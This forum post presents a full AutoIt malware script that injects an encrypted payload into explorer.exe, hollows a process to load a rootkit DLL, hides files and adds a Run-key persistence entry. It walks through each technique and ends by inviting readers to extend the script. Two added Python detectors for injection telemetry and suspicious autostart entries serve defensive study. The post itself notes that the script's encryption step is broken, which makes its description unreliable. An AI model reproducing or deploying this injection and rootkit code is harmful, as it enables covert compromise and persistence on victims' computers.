
In-Depth Analysis of AutoIt encryption Script: Dynamic Payload Injection and Rootkit Integration

Posted by Pope (registered 21.06.2023)
Code:
#include <WinAPI.au3>
#include <WinAPIProc.au3>
#include <Crypt.au3>
#include <File.au3>
#include <WinReg.au3>

Global Const $PROCESS_ALL_ACCESS = 0x1F0FFF
Global Const $MEM_COMMIT = 0x1000
Global Const $PAGE_EXECUTE_READWRITE = 0x40

$payloadPath = "path/to/yourpayload.dll"
$payload = FileRead($payloadPath, FileGetSize($payloadPath))

$encryption_key = _GenerateRandomKey()

$targetProcess = "explorer.exe"
$pid = ProcessExists($targetProcess)
If $pid = 0 Then Exit

$hProcess = _WinAPI_OpenProcess($PROCESS_ALL_ACCESS, False, $pid)
If @error Then CleanupAndExit()

$originalEntryPoint = _GetOriginalEntryPoint($hProcess)
If Not _WinAPI_NtUnmapViewOfSection($hProcess, $originalEntryPoint) Then CleanupAndExit()

$payloadStruct = DllStructCreate("byte[" & BinaryLen($encryptedPayload) & "]")
$payloadPtr = _WinAPI_VirtualAllocEx($hProcess, $originalEntryPoint, DllStructGetSize($payloadStruct), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)
If @error Then CleanupAndExit()

DllStructSetData($payloadStruct, 1, $encryptedPayload)
If Not _WinAPI_WriteProcessMemory($hProcess, $payloadPtr, DllStructGetPtr($payloadStruct), DllStructGetSize($payloadStruct)) Then CleanupAndExit()

$decryptionRoutinePtr = _InjectDecryptionRoutine($hProcess, $payloadPtr, $encryption_key)
If $decryptionRoutinePtr = 0 Then CleanupAndExit()

If Not _WinAPI_SetThreadContext($hProcess, $decryptionRoutinePtr) Then CleanupAndExit()

If Not _WinAPI_ResumeThread($hProcess) Then CleanupAndExit()

Local $hDecryptionEvent = _WinAPI_CreateEvent()
If Not _WinAPI_SetEvent($hDecryptionEvent) Then CleanupAndExit()

_WinAPI_WaitForSingleObject($hDecryptionEvent, 10000)
_WinAPI_CloseHandle($hDecryptionEvent)

_InjectRootkitAndPersistence()
CleanupAndExit()

Func _InjectDecryptionRoutine($hProcess, $payloadPtr, $key)
    Local $hKey = _AES256_Init($key)
    Local $decryptedPayload = _AES256_Decrypt($hKey, $payloadPtr, BinaryLen($encryptedPayload))
    If Not _WinAPI_WriteProcessMemory($hProcess, $payloadPtr, $decryptedPayload, BinaryLen($decryptedPayload)) Then Return 0
    Local $hDecryptionEvent = _WinAPI_CreateEvent()
    _WinAPI_ResetEvent($hDecryptionEvent)
    _WinAPI_SetEvent($hDecryptionEvent)
    Return $payloadPtr
EndFunc

Func _AES256_Init($key)
    Local $hCryptProv = 0
    _Crypt_Startup()
    _Crypt_AcquireContext($hCryptProv)
    Local $hKey = _Crypt_ImportRawKey($hCryptProv, $CALG_AES_256, $key)
    Return $hKey
EndFunc

Func _AES256_Decrypt($hKey, $data, $size)
    Local $hCryptStream = _Crypt_CreateHash($hKey, $CALG_AES_256)
    _Crypt_HashData($hCryptStream, $data, $size)
    Local $decryptedData = _Crypt_HashFinal($hCryptStream)
    Return $decryptedData
EndFunc

Func _GetOriginalEntryPoint($hProcess)
    Local $lpImageDosHeader = _WinAPI_ReadProcessMemory($hProcess, 0, 0x40)
    Local $iOriginalEntryPoint = DllStructGetData(DllStructCreate("uint;dword;dword;uint", $lpImageDosHeader), 3)
    Return $iOriginalEntryPoint
EndFunc

Func _GenerateRandomKey()
    Local $key = ""
    For $i = 1 To 32
        $key &= Chr(Random(0, 255, 1))
    Next
    Return $key
EndFunc

Func _InjectRootkitAndPersistence()
    Local $rootkitPath = "path/to/your/rootkit.dll"
    Local $rootkitPayload = FileRead($rootkitPath, FileGetSize($rootkitPath))
    Local $hollowedProcess = _CreateHollowedProcess($targetProcess, $rootkitPayload)
    If $hollowedProcess = 0 Then Return
    _HideFile($rootkitPath)
    _CreateRegistryEntry()
    _WinAPI_CloseHandle($hollowedProcess)
EndFunc

Func _CreateHollowedProcess($targetProcess, $payload)
    Local $processInfo = _WinAPI_CreateProcess($targetProcess, "", $PROCESS_ALL_ACCESS, 1)
    If @error Then Return 0
    Local $originalEntryPoint = _GetOriginalEntryPoint($processInfo.hProcess)
    _WinAPI_NtUnmapViewOfSection($processInfo.hProcess, $originalEntryPoint)
    Local $payloadPtr = _WinAPI_VirtualAllocEx($processInfo.hProcess, $originalEntryPoint, BinaryLen($payload), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)
    _WinAPI_WriteProcessMemory($processInfo.hProcess, $payloadPtr, $payload, BinaryLen($payload))
    Local $context = _WinAPI_GetThreadContext($processInfo.hThread)
    $context.Eip = $payloadPtr
    _WinAPI_SetThreadContext($processInfo.hThread, $context)
    Return $processInfo.hProcess
EndFunc

Func _HideFile($filePath)
    Local $attributes = FileGetAttrib($filePath)
    FileSetAttrib($filePath, $attributes & "+H")
EndFunc

Func _CreateRegistryEntry()
    Local $keyName = "Software\Microsoft\Windows\CurrentVersion\Run"
    Local $valueName = "MyRootkit"
    Local $executablePath = "path/to/your/executable.exe"
    _WinAPI_RegWrite(HKEY_CURRENT_USER, $keyName, $valueName, "REG_SZ", $executablePath)
EndFunc

Func CleanupAndExit()
    If $hProcess <> 0 Then
        _WinAPI_CloseHandle($hProcess)
    EndIf
    Exit
EndFunc

Introduction:
The following post delves into an AutoIt script that demonstrates advanced techniques, including injecting a payload dynamically into a running process and integrating a rootkit for persistence. This script, while informative, carries ethical and legal implications. We'll provide an in-depth breakdown of its components, step-by-step explanations of the techniques used, and a discussion of potential use cases and concerns.

Code Overview:
The provided script showcases a multi-faceted approach to payload injection and rootkit integration. The script is structured into various sections, each serving a specific purpose. It is important to note that this script should not be used for malicious purposes.

Dynamic Encryption Key:
The script starts by generating a dynamic encryption key for each execution. This key is crucial for encrypting and decrypting the payload, adding a layer of security and complexity to the process.

Process Injection:
The script identifies a target process, often "explorer.exe", and opens it for manipulation. The original entry point of the process is then obtained. Subsequently, the script uses the `_WinAPI_NtUnmapViewOfSection` function to unmap the original entry point. This technique prepares the process for code injection.

Encrypted Payload Injection:
The script reads an external payload file (DLL) and encrypts it using the generated encryption key. It then allocates memory within the target process using `_WinAPI_VirtualAllocEx` and writes the encrypted payload. This technique ensures that the payload is injected into the target process's memory space.

Decryption Routine Injection:
A decryption routine is injected into the target process. This routine decrypts the payload within the process memory, rendering it executable. The `_InjectDecryptionRoutine` function is central to this process, utilizing AES-256 encryption for added security. The script then manipulates the thread context using `_WinAPI_SetThreadContext` and resumes the thread execution.
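What the three steps above look like from the monitoring side: a handle to `explorer.exe` opened with `PROCESS_ALL_ACCESS` (0x1F0FFF), a remote allocation with `PAGE_EXECUTE_READWRITE` (0x40), and a thread-context change on the same target, all from one source process. Note that, as posted, the script never assigns `$encryptedPayload`, and `_AES256_Decrypt` calls the Crypt.au3 hashing functions rather than a decryption routine, so the encryption layer the post describes is not what shows up in telemetry; the process-access and memory operations are. The Python below is an added example, not code from the original post: it correlates constructed telemetry records (a hypothetical field layout loosely modelled on Sysmon ProcessAccess events plus EDR-style memory events, not real sensor output) per source/target process pair and reports pairs that obtained injection rights, scoring how many of the three stages were seen. The `Event` fields, the sample records and the stage scoring are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass

# Win32 process access rights; PROCESS_ALL_ACCESS and the RWX protection
# are the same constants the script above requests.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1F0FFF
PAGE_EXECUTE_READWRITE = 0x40

# The minimum rights a remote code-injection chain needs on the target.
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE


@dataclass
class Event:
    """Hypothetical telemetry record (assumed layout, not a real sensor schema)."""
    kind: str         # "ProcessAccess", "RemoteAlloc" or "SetThreadContext"
    source: str       # image of the process performing the action
    source_pid: int
    target: str       # image of the process being acted on
    target_pid: int
    detail: int = 0   # GrantedAccess for ProcessAccess, page protection for RemoteAlloc


EXPLORER = r"C:\Windows\explorer.exe"
STAGER = r"C:\Users\u\AppData\Local\Temp\build.exe"

# Constructed sample telemetry: one benign handle open, one AV-style read,
# and the three-stage chain the injection walkthrough above would produce.
SAMPLE_EVENTS = [
    Event("ProcessAccess", r"C:\Windows\System32\svchost.exe", 900, EXPLORER, 4321, 0x1000),
    Event("ProcessAccess", STAGER, 5566, EXPLORER, 4321, PROCESS_ALL_ACCESS),
    Event("RemoteAlloc", STAGER, 5566, EXPLORER, 4321, PAGE_EXECUTE_READWRITE),
    Event("SetThreadContext", STAGER, 5566, EXPLORER, 4321),
    Event("ProcessAccess", r"C:\Program Files\AV\scanner.exe", 777, EXPLORER, 4321, 0x1410),
]


def has_injection_rights(granted: int) -> bool:
    """True if the granted mask is PROCESS_ALL_ACCESS or covers every bit in INJECT_MASK."""
    return granted == PROCESS_ALL_ACCESS or (granted & INJECT_MASK) == INJECT_MASK


def correlate(events):
    """Collapse events into one record per (source_pid, target_pid) pair,
    noting which of the three injection stages were observed."""
    chains = defaultdict(lambda: {"rights": False, "rwx_alloc": False, "ctx": False})
    for ev in events:
        chain = chains[(ev.source_pid, ev.target_pid)]
        chain["source"], chain["target"] = ev.source, ev.target
        if ev.kind == "ProcessAccess" and has_injection_rights(ev.detail):
            chain["rights"] = True
        elif ev.kind == "RemoteAlloc" and ev.detail == PAGE_EXECUTE_READWRITE:
            chain["rwx_alloc"] = True
        elif ev.kind == "SetThreadContext":
            chain["ctx"] = True
    return chains


def detect(events):
    """Return (source_pid, target_pid, stages) for every pair that obtained
    injection rights; stages counts how many of the three steps were seen (1-3)."""
    hits = []
    for (src, dst), chain in correlate(events).items():
        if not chain["rights"]:
            continue
        stages = 1 + int(chain["rwx_alloc"]) + int(chain["ctx"])
        hits.append((src, dst, stages))
    return hits


if __name__ == "__main__":
    for src, dst, stages in detect(SAMPLE_EVENTS):
        print(f"suspicious injection chain: pid {src} -> pid {dst}, {stages}/3 stages observed")
```

The benign `svchost.exe` and scanner handles are not reported because their masks (0x1000, 0x1410) lack the write/operation/thread bits; only the stager's pair reaches 3/3. Requiring the rights stage before counting the others keeps legitimate RWX allocations (JIT engines) from scoring on their own.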

Rootkit Integration and Persistence:
Once the payload is decrypted and executed, the script injects a rootkit payload using the "Process Hollowing" technique. The rootkit is stored in an external DLL. The `_CreateHollowedProcess` function is responsible for this injection. Moreover, the script manipulates file attributes and the Windows Registry for persistence, which can facilitate unauthorized access.
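The persistence half of the script leaves two artifacts an administrator can audit without special tooling: a value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and an image file with the hidden attribute set. The Python below is an added example, not part of the original post: it parses Run values the way a reviewer should (a quoted path, or an unquoted path resolved by emulating the progressive prefix search `CreateProcess` performs for unquoted paths with spaces), then flags entries whose image is missing, carries the hidden attribute, or sits in a user-writable staging directory. On Windows it reads the live key through `winreg` and file attributes through `os.stat`; elsewhere it runs against the constructed `SAMPLE_RUN` and `SAMPLE_FS` data. The suspect-directory list, the sample user "u" and the finding labels are assumptions.

```python
import os
import stat
import sys

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Directories a standard user can write to and that legitimate autostart
# entries rarely point at (assumed list; tune for your environment).
SUSPECT_DIR_MARKERS = ("\\temp\\", "\\downloads\\", "\\public\\")

# Constructed sample Run values (hypothetical user "u"); "MyRootkit" mirrors
# the value name used in the script above.
SAMPLE_RUN = {
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "MyRootkit": r"C:\Users\u\AppData\Local\Temp\svc host.exe",
    "Updater": r'"C:\Program Files\Vendor\update.exe"',
    "Stale": r"C:\Users\u\AppData\Roaming\gone.exe",
}

# Constructed sample file system: path -> attribute letters ("H" = hidden).
SAMPLE_FS = {
    r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe": set(),
    r"C:\Users\u\AppData\Local\Temp\svc host.exe": {"H"},
    r"C:\Program Files\Vendor\update.exe": set(),
}


def image_path_from_run_value(command, exists):
    """Extract the image path from a Run value. Quoted commands are unambiguous;
    unquoted ones are resolved by trying ever-longer space-delimited prefixes,
    as CreateProcess does, and taking the first one that exists."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    parts = command.split(" ")
    for i in range(1, len(parts) + 1):
        candidate = " ".join(parts[:i])
        if exists(candidate):
            return candidate
    return parts[0]


def in_suspect_dir(path):
    lowered = path.lower()
    return any(marker in lowered for marker in SUSPECT_DIR_MARKERS)


def audit_run_values(run_values, exists, attributes):
    """Return [(value_name, image_path, [reasons])] for entries worth a look.
    `exists` and `attributes` are callables so the same logic runs against
    either the live file system or the constructed sample."""
    findings = []
    for name, command in sorted(run_values.items()):
        path = image_path_from_run_value(command, exists)
        reasons = []
        if not exists(path):
            reasons.append("missing-image")
        else:
            if "H" in attributes(path):
                reasons.append("hidden-attribute")
            if in_suspect_dir(path):
                reasons.append("user-writable-dir")
        if reasons:
            findings.append((name, path, reasons))
    return findings


def read_hkcu_run():
    """Enumerate the live HKCU Run key on Windows; elsewhere return the sample."""
    if sys.platform != "win32":
        return SAMPLE_RUN
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            values[name] = str(data)
            index += 1
    return values


def live_attributes(path):
    """Attribute letters for a real file (Windows exposes st_file_attributes)."""
    try:
        fa = getattr(os.stat(path), "st_file_attributes", 0)
    except OSError:
        return set()
    return {"H"} if fa & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2) else set()


if __name__ == "__main__":
    if sys.platform == "win32":
        findings = audit_run_values(read_hkcu_run(), os.path.exists, live_attributes)
    else:
        findings = audit_run_values(SAMPLE_RUN, SAMPLE_FS.__contains__, SAMPLE_FS.__getitem__)
    for name, path, reasons in findings:
        print(f"{name}: {path} [{', '.join(reasons)}]")
```

Against the sample data only `MyRootkit` (hidden, under `Temp`) and `Stale` (image gone) are reported; the OneDrive and vendor updater entries pass. Treating the unquoted-path case explicitly matters because an entry like `C:\...\Temp\svc host.exe` would otherwise be mis-resolved to a non-existent `svc` and reported for the wrong reason.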

Script features and functions can be extended and modified as you please.